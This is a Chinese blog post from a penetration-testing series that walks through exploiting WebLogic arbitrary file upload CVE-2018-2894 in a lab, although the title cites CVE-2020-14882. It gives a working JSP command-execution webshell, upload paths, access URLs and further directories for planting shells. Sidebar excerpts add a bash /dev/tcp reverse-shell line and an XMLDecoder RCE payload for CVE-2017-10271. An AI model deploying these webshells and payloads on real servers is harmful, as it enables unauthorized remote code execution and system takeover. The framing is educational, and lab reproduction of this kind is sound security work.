渗透测试系列:weblogic文件路径确认(cve-2020-14882)

最新推荐文章于 2025-05-13 16:38:40 发布
原创 最新推荐文章于 2025-05-13 16:38:40 发布 · 1.3k 阅读 · 16 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#docker

本文详细描述了Weblogic服务器上的CVE-2018-2894漏洞复现过程,涉及使用burp工具获取时间戳,通过安全界面上传webshell以及两种不同的文件上传路径,包括css目录、uddiexplorer、images和应用安装目录。

weblogic文件路径确认



一. Weblogic任意文件上传漏洞(CVE-2018-2894)

漏洞复现

1. 开启burp,寻找时间戳

在这里插入图片描述
在这里插入图片描述
打开burp内嵌浏览器

1.访问http://192.168.42.157:7001/ws_utc/config.do,将Work Home Dir替换成

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

ws_utc应用的静态文件css目录是无需访问权限的,而默认的工作目录即使上传成功,也无法访问。 如果不更改,访问会返回404

然后点击提交
在这里插入图片描述

在这里插入图片描述

2.点击安全–>添加,然后名字和密码随便写,点击浏览,将自己的webshell上传上去

在这里插入图片描述

在这里插入图片描述

这里用shell.jsp,代码如下:

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

3. 获得时间戳

时间戳的主要 目的在于通过一定的技术手段,对数据产生的时间进行认证,从而验证这段数据在产生后是否经过篡改

方式一:

在这里插入图片描述

方式二

点击链接右键即可

在这里插入图片描述

4. 查看上传的shell文件

burp目录下面没有没事,

在这里插入图片描述

访问http://192.168.42.157:7001/ws_utc/css/config/keystore/[时间戳]_[文件名],即可执行webshell

http://192.168.42.157:7001/ws_utc/css/config/keystore/1705034868556_shell.jsp?pwd=023&i=ls

在这里插入图片描述

http://192.168.42.157:7001/ws_utc/css/config/keystore/1705034868556_shell.jsp

在这里插入图片描述

可看到成功上传webshell,这里127.0.0.1:90是因为我做了端口映射

注意:
1.为什么要替换Work Home Dir?

因为我们需要一个可以访问的路径,当前的工作目录是不能被外网访问到的,开始页面提示自动部署应用后跳转到后台管理页面,这个我们修改的Work Home Dir就是部署的web应用的目录,该目录外网可以访问到,并且不需要权限,外网访问它里面的文件就是http://your-ip:7001/ws_utc/css/文件名

2.为什么访问路径要这么写?

因为前面设置了工作目录为ws_utc应用的静态文件css目录,该目录是无需权限的,后面的路径是调试java代码出的路径

访问路径
http://192.168.42.157:7001/ws_utc/css/shell.jsp

在这里插入图片描述

这里的上传路径为

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css/shell.jsp

总结

目前已经确定了两种上传方式

前提

访问http://192.168.42.157:7001/ws_utc/config.do,将Work Home Dir替换成

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
一种是

  1. 访问 http://192.168.42.157:7001/ws_utc/config.do中的安全,添加用户名密码shell文件

  2. 添加的同时需要F12brup捕获

  3. 查看时间戳

  4. 访问http://192.168.42.157:7001/ws_utc/css/config/keystore/[时间戳]_[文件名],即可执行webshell

  5. 进入dokcer容器里面并没看到这个shell文件

另外一种是

用weblogic利用工具直接上传

这里的上传路径为

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css/shell.jsp

访问路径为

http://192.168.42.157:7001/ws_utc/css/shell.jsp

这种方式在docker容器里面可以看到对应的shell文件

后题

在这里插入图片描述

二. weblogic文件上传路径

将shell写到uddiexplorer目录

uddiexplorer目录上传shell

/u01/domains/osb/servers/AdminServer/tmp/_WL_internal/uddiexplorer/随机字符/war/666.jsp

shell 访问

http://xxxx/uddiexplorer/shell.jsp

将shell写到images目录

上传目录

/Oracle/Middleware/wlserver_10.3/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/shell.jsp

访问目录

http://*.*.*.*:7001/console/framework/skins/wlsconsole/images/shell.jsp

将shell写到应用安装目录

上传目录

\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\项目名\随机字符\war\shell.jsp

访问目录

http://*.*.*.*:7001/项目名/shell.jsp






tomyyyyy

weblogic文件上传路径

番茄酱料

Weblogic任意文件上传漏洞(CVE-2018-2894)

渗透测试:渗透流程思路(当拿到一个WindowsIP,演示weblogic漏洞cve-2020-14882
weixin_54626591的博客
01-12 297
渗透测试:渗透流程思路(当拿到一个WindowsIP)
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268)
qq_51577576的博客
03-13 1561
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268) 在ImageMagick 7.1.0-51版本及以前存在CVE-2022-44268漏洞。 ImageMagick 7.1.0-49 容易受到信息泄露的攻击。当它解析PNG图像(例如,调整大小)时,生成的图像可能嵌入了任意远程文件的内容(如果ImageMagick二进制文件有权读取它)。
Web渗透实验:基于Weblogic的一系列漏洞
01-31 521
1.攻击机windows10 192.168.2.104 2.靶机ip:   192.168.2.109(linux Ubantu)   192.168.2.111(windows2008R264位) 第一步:启动靶机服务 分别为linux和windows windows环境搭建:   链接:https://pan.baidu.com/s/16KyYb1v1rP...
weblogic未授权访问漏洞复现(CVE-2020-14882
Armandhe的博客
06-07 5863
有了它,你知道怎么上fofa上搜搜搞搞小日本了吧
Weblogic 常规渗透测试环境(文件读取漏洞)
EC_Carrot的博客
08-21 858
简介 本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟对weblogic场景的渗透。 Weblogic版本:10.3.6(11g) Java版本:1.6 弱口令: weblogic Oracle@123 复现操作 接下来我们假设不知道弱口令,那我们怎么靠文件读取来getshell呢? 本环境前台模拟了一个任意文件下载漏洞,访问http://your-ip:7001/hello/file.jsp?path=/etc/passwd可见成
修改weblogic控制台路径
weixin_53150440的博客
07-12 2970
修改weblogic控制台路径
weblogic漏洞——CVE-2020-14882
weixin_57379923的博客
08-13 1922
版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。在 web 服务器中写入 xml 脚本。作 者:PeiyuJue。
weblogic寻找路径
weixin_48776804的博客
06-25 1042
weblogic寻找路径
weblogic 反序列化(CVE-2020-2883)
qq_52579508的博客
08-31 1037
描述: Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。“bash -i >& /dev/tcp/172.18.52.33/11111 0>&1” 这一段是需要进行编译的。前面是的 nc 监听 一直出问题 我的 监听ip 出错了 所以一直错 一直监听不到。后面换了windows 使用子系统去运行 poc poc 应该没问题 可能是 监听问题。用的kali 监听 很慢 一直返回不了 shell。
Web漏洞挖掘班作业 | CVE-2020-2551攻击实录
Ms08067安全实验室
11-15 1937
文章来源|MS08067 Web安全漏洞挖掘实战班课后作业本文作者:某学员A(Web漏洞挖掘实战班1期学员)写再最前听了涛哥关于weblogic的课程讲解,收益颇多(前段时间实在太忙了~ ...
Weblogic 反序列化远程命令执行漏洞 CVE-2019-2725 详解
m0_67544876的博客
05-13 1546
CVE-2019-2725 漏洞作为 WebLogic 的一个严重安全隐患,给企业的网络安全带来了巨大威胁。了解该漏洞的原理、危害、检测及修复方法,对于保障 WebLogic 服务器的安全至关重要。在日常运维过程中,企业应密切关注安全漏洞信息,及时采取有效的防护措施,定期对服务器进行安全检测和漏洞扫描,确保系统的安全性和稳定性,防止因类似漏洞被攻击者利用而造成不可挽回的损失。
CVE-2020-14882
Dikesi的博客
02-10 1757
Weblogic未授权命令执行漏洞
Weblogic Console远程代码执行漏洞(CVE-2020-14882)
Li-D的博客
06-04 7591
漏洞描述 2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882。远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。 影响版本 Oracle WeblogicServer 10.3.6.0.0 Oracle WeblogicServer 12.1.3.0
CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
AzVoidSUN的博客
11-04 1538
环境安装 首先电脑已安装好的jdk \bin目录下 然后java -jar 执行你的jar包就可以了 Oracle WebLogic Server版本:10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。均存在此漏洞。 构造poc ,未授权访问后台地址http://127.0.0.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsCo
weblogic-CVE-2020-14882CVE-2020-14883
jjxsir的博客
05-20 790
2020年10月的更新中,Oracle官方修复了两个安全漏洞,分别是CVE-2020-14882CVE-2020-14883,CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10.3.6并不存在com.tangosol.coherence.mvel2.sh.ShellSession类。依旧显示404页面,进容器里面看看命令是否执行。
CVE-2020-14882 weblogic未授权远程命令执行漏洞
栉风沐雪的博客
02-22 5954
Oracle WebLogic Server 远程代码执行漏洞 (CVE-2020-14882)POC 被公开,未经身份验证)的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。
WebLogic远程代码执行漏洞CVE-2020-14882
2401_82451607的博客
09-22 446
WebLogic远程代码执行漏洞CVE-2020-14882
weblogic 获取文件路径 下载文件
chencj123的专栏
01-03 3716
今日遇到一个问题:做了一个文件下载的功能,本机装的是Tomcat,测试的时候能运行过,但是发布到weblogic上面的时候就一直报错:未找到文件。 百度过后发现: /** * 文件下载 * 文件放在webapp/lssi/fileresoure 下面, * 如:publicBusniess下面的征地农转非登记表,则在fileresoure 下面新建publicbusniess文件夹,并且
weblogic 控制台访问路径
u013295690的博客
04-23 3850
修改位置:/u02/weblogic/wlserver_10.3/server/lib/consoleapp/META-INF/application.xml: gscf
cyberstrikelab.com靶场CVE-2017-10271
最新发布
07-04
<think>嗯,用户需要关于CVE-2017-10271漏洞在cyberstrikelab.com靶场的学习资源。这个请求很具体,用户可能是个网络安全学习者或渗透测试人员,正在寻找实践环境。CVE-2017-10271是WebLogic反序列化漏洞,属于高危漏洞。用户特意提到cyberstrikelab.com,说明需要实战环境。不过这个靶场可能需要注册或付费,我得先确认访问方式。 关于漏洞本身,需要强调三点核心:1)漏洞触发点在wls-wsat组件2)利用XMLDecoder反序列化3)通常用Java反序列化payload。用户可能已经了解基础,所以重点给实操资源。 靶场资源方面,cyberstrikelab.com确实有专门模块,但需要登录。免费替代方案可以考虑Vulhub环境,它在GitHub开源,搭建简单。另外Exploit-DB的PoC代码要谨慎使用,必须隔离测试。 用户可能更关心操作步骤而非原理,所以把漏洞复现流程拆解成:环境检测->PoC发送->回连利用。特别提醒wget检测方法,这是实际渗透中常用的轻量级检测手段。 法律风险必须强调,所有引用都加了方括号标注。最后补充的替代资源是考虑到用户可能无法立即访问该靶场,提供Vulhub和HTB的备选方案。</think>以下是针对CVE-2017-10271漏洞在CyberStrikeLab靶场的资源指南,结合漏洞原理和实践建议: ### 漏洞核心原理 CVE-2017-10271是Oracle WebLogic WLS Security组件反序列化漏洞,攻击者通过发送特制的XML数据可执行任意代码: $$ \text{恶意XML} \xrightarrow{\text{XMLDecoder反序列化}} \text{远程代码执行} $$ 关键点在`wls-wsat`组件的未授权访问端点(如`/wls-wsat/CoordinatorPortType`)[^1]。 --- ### CyberStrikeLab靶场实践 1. **靶场访问路径** - 登录后搜索"CVE-2017-10271"实验模块 - 环境已预置存在漏洞的WebLogic 10.3.6(需开启`wls-wsat`组件) 2. **漏洞复现步骤** ```http POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: target-ip:7001 Content-Type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"><string>/bin/bash</string></void> <void index="1"><string>-c</string></void> <void index="2"><string>touch /tmp/pwned</string></void> </array> <void method="start"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ``` > 此PoC会在目标服务器创建`/tmp/pwned`文件(需替换命令为反弹shell) 3. **自动化工具推荐** - [GitHub - vulhub/weblogic-CVE-2017-10271](https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271)docker环境 - [Exploit-DB #43458](https://www.exploit-db.com/exploits/43458) 验证脚本 - 使用Metasploit模块`exploit/multi/misc/weblogic_deserialize` --- ### 关键学习要点 1. **漏洞检测** 检查`/wls-wsat/CoordinatorPortType`端点是否返回WSDL: ```bash curl -I http://target:7001/wls-wsat/CoordinatorPortType ``` 2. **防御措施** - 删除`wls-wsat`组件:`rm -f $DOMAIN_HOME/servers/AdminServer/tmp/.internal/wls-wsat.war` - 更新至官方补丁(Oracle Critical Patch Update - CPU Oct 2017) 3. **法律边界提醒** > 仅限授权靶场测试!真实环境利用涉嫌违法[^2] --- ### 替代资源(若靶场不可用) 1. **本地环境搭建** ```bash git clone https://github.com/vulhub/vulhub cd vulhub/weblogic/CVE-2017-10271 && docker-compose up ``` 2. **在线实验平台** - [HackTheBox靶机: Oracle](https://www.hackthebox.com/)(需VIP) - [TryHackMe: WebLogic Exploitation](https://tryhackme.com/room/weblogic) > **重要**:所有PoC代码必须在隔离环境测试,避免意外攻击[^3] ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

坦笑&&life

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值